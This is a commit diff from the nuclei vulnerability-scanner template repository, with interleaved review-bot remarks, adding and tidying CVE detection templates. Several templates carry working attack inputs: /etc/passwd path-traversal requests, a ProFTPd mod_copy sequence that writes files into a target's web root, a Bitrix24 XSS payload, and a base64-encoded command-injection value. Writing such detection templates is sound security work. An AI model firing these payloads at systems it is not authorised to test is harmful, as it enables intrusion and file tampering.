Merge branch 'master' into wordpress-cves

patch-1
PD-Team 2021-03-12 17:25:27 +05:30 committed by GitHub
commit c35ed8a408
142 changed files with 990 additions and 177 deletions


@ -11,7 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Install tree
run: sudo apt-get install tree -y


@ -19,6 +19,6 @@ fuzzing/
# Wordlist directory contains payload to be used with templates.
helpers/
miscellaneous/
headless/
# Workflows are excluded from default run to avoid duplicate scans.
workflows/


@ -1,9 +1,17 @@
---
extends: default
ignore: |
.pre-commit-config.yaml
.github/workflows/*.yml
rules:
document-start: disable
line-length: disable
new-lines: disable
new-line-at-end-of-file: disable
truthy: disable
comments:
require-starting-space: true
ignore-shebangs: true
min-spaces-from-content: 1
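Review bot: `truthy: disable` at L45 switches off the one rule that catches `yes`/`no`/`on`/`off` being read as booleans inside template values, and the usual reason for disabling it — the `on:` key in GitHub workflows — is already handled by the `.github/workflows/*.yml` entry under `ignore:` (L39). If the installed yamallint version supports it, `truthy: {allowed-values: ['true', 'false']}` keeps the check for template values such as `unsafe: yes`. `new-line-at-end-of-file: disable` likewise lets templates land without a trailing newline; if that is deliberate, a one-line comment saying why would stop the next maintainer re-enabling it.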


@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 236 | vulnerabilities | 108 | exposed-panels | 104 |
| exposures | 61 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
| cves | 239 | vulnerabilities | 106 | exposed-panels | 104 |
| exposures | 63 | technologies | 50 | misconfiguration | 53 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**72 directories, 705 files**.
**76 directories, 720 files**.
</td>
</tr>


@ -9,6 +9,7 @@ requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and


@ -0,0 +1,28 @@
id: CVE-2015-3306
info:
name: ProFTPd RCE
author: pd-team
severity: high
reference: https://github.com/t0kx/exploit-CVE-2015-3306
description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
tags: cve,cve2015,ftp,rce,network
network:
- inputs:
- data: "site cpfr /proc/self/cmdline\r\n"
read: 1024
- data: "site cpto /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpfr /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpto /var/www/html/{{randstr}}\r\n"
host:
- "{{Hostname}}:21"
read-size: 1024
matchers:
- type: word
words:
- "Copy successful"
part: raw
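Review bot: This template is not detection-only: the inputs at L96–L98 copy the file a second time into `/var/www/html/{{randstr}}`, leaving an attacker-style artifact in the target's web root on every scan. If the server already answers `Copy successful` to the first `site cpto` at L94, the matcher at L105 fires without the web-root write, so the two inputs at L96–L98 can be dropped and only the `/tmp` copy kept; at minimum the `description` should say that the template writes files on the target. The `/tmp/.{{randstr}}` file is never removed either, which deserves a note such as `# NOTE: leaves /tmp/.<randstr> on the target; mod_copy offers no delete`. Whether every `{{randstr}}` occurrence expands to the same value within one run is not visible here — if it does not, the `cpfr` at L96 names a file that was never written.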


@ -5,7 +5,8 @@ info:
author: pikpikcu
severity: high
issues: https://github.com/geddy/geddy/issues/697
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference: https://nodesecurity.io/advisories/geddy-directory-traversal
tags: cve,cve2015,geddy,lfi
requests:


@ -23,5 +23,5 @@ requests:
- 200
- type: word
words:
- "Backtrace"
part: header
- "Memory map"
part: body


@ -6,7 +6,7 @@ info:
severity: medium
tags: cve,cve2017,trixbox,traversal
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# reference:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Product vendor:-https://sourceforge.net/projects/asteriskathome/


@ -4,7 +4,7 @@ info:
name: Nextjs v2.4.1 LFI
author: pikpikcu
severity: high
refrence: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
tags: cve,cve2017,nextjs,lfi
requests:


@ -0,0 +1,26 @@
id: CVE-2018-1207
info:
name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE
author: dwisiswant0
severity: critical
reference: https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf
description: |
This template supports the detection part only.
Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability
which could be used to execute remote code. A remote unauthenticated attacker may
potentially be able to use CGI variables to execute remote code.
https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py
tags: cve,cve2018,dell,injection,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"
matchers:
- type: word
words:
- "calling init: /lib/"
part: all
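Review bot: The last line of the `description` block (L166) is a PoC URL, which belongs under `reference:`; this same commit moves such links into `reference: |` lists elsewhere (the Cisco RV320 and Netsweeper templates), so this new file should follow suit. The single `word` matcher at L173–L176 has no `matchers-condition` or status check, so an error page that echoes `calling init: /lib/` would also match; adding `matchers-condition: and` plus a `- type: status` matcher with `status: [200]` tightens it. The request sets `LD_DEBUG=files` through the CGI query string, which appears to exercise the injection path itself rather than read a version banner — worth stating next to the existing "detection part only" sentence.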


@ -8,7 +8,7 @@ info:
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Refrence: https://www.exploit-db.com/exploits/47138
# reference: https://www.exploit-db.com/exploits/47138
requests:
- raw:


@ -0,0 +1,26 @@
id: CVE-2018-18778
info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: high
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
tags: cve,cve2018,lfi
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host:
Content-Length: 4
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
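Review bot: The raw request declares `Content-Length: 4` (L204) but sends no body, so a server that honours the header may sit waiting for four bytes and the template times out instead of matching; if the header is not part of the published PoC drop it, otherwise document it with `# Content-Length is required by the PoC; no body is sent`. The `|+` block scalar keeps the trailing newlines, which is what terminates the header block here — a comment saying so would stop someone "fixing" it to `|`. The regex `root:[x*]:0:0:` only matches a password field of exactly `x` or `*`; `root:[^:]*:0:0:` also covers an empty or `!`-locked field.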


@ -4,7 +4,7 @@ info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
reference: https://www.cvedetails.com/cve/CVE-2018-19386/
tags: cve,cve2018,solarwinds,xss
requests:


@ -4,7 +4,9 @@ info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
reference: |
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,


@ -33,6 +33,7 @@ requests:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and
matchers:
- type: dsl


@ -8,7 +8,7 @@ info:
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Refrence: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
requests:
- method: GET


@ -5,6 +5,11 @@ info:
author: dwisiswant0
severity: high
tags: cve,cve2019,cisco
description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
reference: |
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
- https://www.exploit-db.com/exploits/46262/
- https://www.exploit-db.com/exploits/46655/
requests:
- method: GET


@ -5,6 +5,9 @@ info:
author: madrobot
severity: high
tags: cve,cve2019,oracle,traversal
reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
description: |
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security)
requests:
- method: GET


@ -19,6 +19,8 @@ requests:
- method: POST
path:
- "{{BaseURL}}/_async/AsyncResponseService"
headers:
Content-Type: application/soap; charset="utf-8"
body: >-
<?xml version="1.0" encoding="UTF-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"


@ -3,7 +3,8 @@ info:
author: Harsh Bothra
name: Atlassian Confluence Path Traversal
severity: high
refrense: https://github.com/x-f1v3/CVE-2019-3396
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
reference: https://github.com/x-f1v3/CVE-2019-3396
tags: cve,cve2019,atlassian,confluence,traversal,rce
requests:


@ -5,7 +5,7 @@ info:
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
refrense: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
tags: cve,cve2019,atlassian,jira,xss
requests:


@ -10,9 +10,9 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" # CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5129
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET


@ -4,7 +4,7 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
refrence: https://www.exploit-db.com/exploits/47619
reference: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/


@ -7,17 +7,6 @@ info:
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
tags: cve,cve2019,atlassian,jira,ssrf
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817
requests:
- method: GET
path:


@ -3,6 +3,7 @@ id: CVE-2020-0618
info:
name: RCE in SQL Server Reporting Services
author: joeldeleep
description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
severity: high
reference: https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
tags: cve,cve2020,rce


@ -19,15 +19,14 @@ requests:
- method: GET
path:
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
matchers-condition: and
matchers:
- type: word
words:
- "SolarWinds.Orion.Core."
# - "Connection String" # Commented matchers can be used for "SWNetPerfMon.db" file.
part: body
- type: word
@ -37,13 +36,4 @@ requests:
- type: status
status:
- 200
# - type: word
# words:
# - "Connection String"
# - "text/plain"
# part: all
# condtion: and
#
# Commented matchers can be used for "SWNetPerfMon.db" file.
- 200


@ -4,11 +4,12 @@ info:
name: GLPI v.9.4.6 - Open redirect
author: pikpikcu
severity: low
reference: |
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect
# https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
# https://github.com/glpi-project/glpi/archive/9.4.6.zip
# https://nvd.nist.gov/vuln/detail/CVE-2020-11034
requests:
- method: GET


@ -3,12 +3,12 @@ id: CVE-2020-1147
info:
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
author: dwisiswant0
description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.
severity: critical
tags: cve,cve2020,sharepoint,iis,rce
# Ref:
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
- https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
requests:
- method: GET


@ -6,6 +6,9 @@ info:
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
tags: cve,cve2020,netsweeper,rce
reference: |
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
@ -18,10 +21,6 @@ info:
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
# References:
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
requests:
- method: GET
path:


@ -0,0 +1,31 @@
id: CVE-2020-13483
info:
name: Bitrix24 through 20.0.0 allows XSS
author: pikpikcu
severity: high
reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
tags: cve,cve2020,xss,bitrix
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
matchers-condition: and
matchers:
- type: word
words:
- "{alert(document.domain);}"
part: body
- type: word
words:
- text/html
part: header
- type: status
status:
- 200
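Review bot: The body matcher at L484 looks for `{alert(document.domain);}` on its own, and that substring is also present when the server HTML-escapes the reflected value (`&lt;img ...&gt;` still contains it), so the template can report an escaped, non-exploitable reflection as XSS. Anchor the match on an unescaped tag from the payload as well: add `- "<div>x"` under `words:` with `condition: and`, since `%3Cdiv%3Ex` is part of the request at L479. The header check `text/html` at L488 is fine, but matching the `Content-Type` line specifically would avoid hits on other headers that happen to carry the string.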


@ -0,0 +1,35 @@
id: CVE-2020-13700
info:
name: acf-to-rest-api wordpress plugin IDOR
author: pikpikcu
severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: |
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress
requests:
- method: GET
path:
- '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
matchers-condition: and
matchers:
- type: word
words:
- 'Content-Type: application/json'
part: header
- type: word
words:
- 'acf-to-rest-api\/class-acf-to-rest-api.php'
part: body
condition: and
- type: status
status:
- 200
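Review bot: The header matcher at L516 matches the literal `Content-Type: application/json`, so the header-name casing is part of the match; over HTTP/2 header names arrive lowercased and such responses would be missed. Match the value only, `- 'application/json'`, as the other matcher touched in this commit does (L912). The `condition: and` at L522 sits on a single-word matcher and is a no-op — drop it. It would also help to state in `description` that the template only reads the `active_plugins` option (L511) as a harmless proof of the unauthenticated read, not the credential fields the CVE text mentions.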


@ -11,12 +11,11 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
reference: |
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
tags: cve,cve2020,apache
# References:
# https://s.tencent.com/research/bsafe/1156.html
requests:
- method: GET
path:


@ -11,7 +11,7 @@ info:
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
References:
reference: |
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
tags: cve,cve2020,apache,rce


@ -5,7 +5,7 @@ info:
author: x1m_martijn
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
reference: https://jira.atlassian.com/browse/JRASERVER-71536
tags: cve,cve2020,atlassian,jira
requests:


@ -4,7 +4,8 @@ info:
name: NeDi 1.9C XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413
reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
tags: cve,cve2020,nedi,xss
requests:


@ -6,11 +6,15 @@ info:
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
severity: high
tags: cve,cve2020,oracle,traversal
reference: |
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
- https://www.oracle.com/security-alerts/cpuoct2020.html
requests:
- method: GET
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
# Why is the header needed here? it doesn't appear to be required by the exploit
# headers:
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
path:
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
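Review bot: The new lines L591–L593 ship an open question (`Why is the header needed here?`) and a commented-out header in the template; either delete the header for good or replace the question with the answer once tested, because a committed `# Why …?` reads as unreviewed. The comment `# grab autologin cookies` at L595 implies the second path relies on cookies set by the first request, which in nuclei only works when the request has `cookie-reuse: true`; that key is not visible in this hunk, and if it is not set outside it the `/etc/passwd` request goes out without the session cookie.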


@ -4,7 +4,11 @@ info:
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
author: dwisiswant0
severity: critical
reference: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
reference: |
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA
- https://github.com/jas502n/CVE-2020-14882#eg
description: |
Vulnerability in the Oracle WebLogic Server
product of Oracle Fusion Middleware (component: Console).
@ -15,11 +19,6 @@ info:
Successful attacks of this vulnerability can result in takeover.
tags: cve,cve2020,oracle,rce,weblogic
# References:
# - https://twitter.com/jas502n/status/1321416053050667009
# - https://youtu.be/JFVDOIL0YtA
# - https://github.com/jas502n/CVE-2020-14882#eg
requests:
- payloads:
exec:


@ -4,14 +4,19 @@ info:
name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8
author: dwisiswant0
severity: critical
reference: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
description: |
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.
reference: |
- https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
- https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
- https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10
- https://github.com/orangetw/JNDI-Injection-Bypass
tags: cve,cve2020,mobileiron,rce
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see references[2] below.
# This template works by passing a Hessian header, otherwise;
# it will return a 403 or 500 internal server error. References[3].
# References:
# - [1] https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
# - [2] https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505


@ -9,8 +9,7 @@ info:
with the SSH client enabled, can result in shell injection.
This template supports the detection part only. See references.
References:
reference: |
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
- https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846
tags: cve,cve2020,saltstack


@ -4,16 +4,13 @@ info:
name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE
author: dwisiswant0
severity: critical
reference: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://srcincite.io/pocs/cve-2020-16952.py.txt
- https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
tags: cve,cve2020,sharepoint,iis
# This template supports the detection part only. See references[2].
# References:
# - [1] Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952
# - [2] https://srcincite.io/pocs/cve-2020-16952.py.txt
# - [3] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
# - [4] https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
requests:
- method: GET
path:


@ -4,6 +4,8 @@ info:
author: pussycat0x
severity: critical
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
description: |
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
tags: cve,cve2020,vbulletin,rce
requests:


@ -6,15 +6,7 @@ info:
severity: high
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
tags: cve,cve2020,rce
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker
# to inject commands via the service-cmds parameter in cyrus.php.
# These commands are executed with root
# privileges via service_cmds_peform.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
reference: https://blog.max0x4141.com/post/artica_proxy/
requests:
- raw:


@ -6,14 +6,7 @@ info:
severity: critical
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
tags: cve,cve2020
# Artica Web Proxy 4.30.00000000
# allows remote attacker to bypass privilege detection
# and gain web backend administrator privileges
# through SQL injection of the apikey parameter in fw.login.php.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
references: https://blog.max0x4141.com/post/artica_proxy/
requests:
- method: GET
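Review bot: The key at L723 is `references:` (plural), while the nuclei `info` block and every other template in this commit use `reference:` (see L706 in the sibling Artica template), so this URL will not be picked up as a reference. Change the line to `reference: https://blog.max0x4141.com/post/artica_proxy/`. The tags at L715 are just `cve,cve2020`, whereas the sibling at L697 carries `rce`; adding `sqli,artica` here would make the template findable by tag.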


@ -5,6 +5,9 @@ info:
author: pd-team
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
description: |
Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system,
through a maliciously modified HTTP HEADER.
tags: cve,cve2020,apache,traversal
requests:


@ -4,16 +4,14 @@ info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
reference: |
- http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- http://jvn.jp/en/jp/JVN43969166/index.html
- https://cwiki.apache.org/confluence/display/WW/S2-061
- https://security.netapp.com/advisory/ntap-20210115-0005/
tags: cve,cve2020,apache,rce,struts
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
# References:
# http://jvn.jp/en/jp/JVN43969166/index.html
# http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
# https://cwiki.apache.org/confluence/display/WW/S2-061
# https://security.netapp.com/advisory/ntap-20210115-0005/
description: |
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
requests:
- method: GET


@ -3,6 +3,7 @@ id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
author: pd-team
description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
severity: medium
tags: cve,cve2020,apache,xss


